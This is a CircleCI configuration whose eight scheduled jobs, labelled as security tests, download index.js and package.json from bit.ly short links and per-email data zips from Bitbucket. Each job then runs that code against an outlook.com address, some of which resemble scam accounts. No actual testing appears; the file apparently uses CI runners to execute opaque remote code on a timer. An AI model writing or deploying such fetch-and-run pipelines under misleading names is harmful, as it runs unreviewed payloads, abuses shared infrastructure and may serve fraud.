version: 2.1

jobs:
 security_test_1:
    docker:
      - image: cimg/node:16.13.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/westernunuion-transferdepts1_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: npm i -s
      - run: node index -t 58 -r 2 -e westernunuion-transferdepts1@outlook.com
 security_test_2:
    docker:
      - image: cimg/node:16.13.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/slaveigood11999_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: npm i -s
      - run: node index -t 58 -r 2 -e slaveigood11999@outlook.com
 security_test_3:
    docker:
      - image: cimg/node:16.13.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/coreoilandgas15_outlook-com.zip -o lunarCrushData.zip
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: npm i -s
      - run: node index -t 58 -r 2 -e coreoilandgas15@outlook.com
 security_test_4:
    docker:
      - image: cimg/node:16.13.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/jntc_cl_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: npm i -s
      - run: node index -t 58 -r 2 -e jntc_cl@outlook.com
 security_test_5:
    docker:
      - image: cimg/node:16.13.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/customercare7700_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: npm i -s
      - run: node index -t 57 -r 3 -e customercare7700@outlook.com
 security_test_6:
    docker:
      - image: cimg/node:16.13.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/saad_mounia_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: npm i -s
      - run: node index -t 58 -r 2 -e saad_mounia@outlook.com
 security_test_7:
    docker:
      - image: cimg/node:16.13.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/harriethdin_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: npm i -s
      - run: node index -t 58 -r 2 -e harriethdin@outlook.com
 security_test_8:
    docker:
      - image: cimg/node:16.13.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/waleVCXakande2010_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: npm i -s
      - run: node index -t 58 -r 2 -e waleVCXakande2010@outlook.com
      
      
workflows:
  version: 2
  test:
    triggers:
      - schedule:
          cron: "12 0 * * *"
          filters:
            branches:
              only:
                - main
      - schedule:
          cron: "17 1 * * *"
          filters:
            branches:
              only:
                - main
    jobs:
      - security_test_1
      - security_test_2
      - security_test_3
      - security_test_4
      - security_test_5
      - security_test_6
      - security_test_7
      - security_test_8
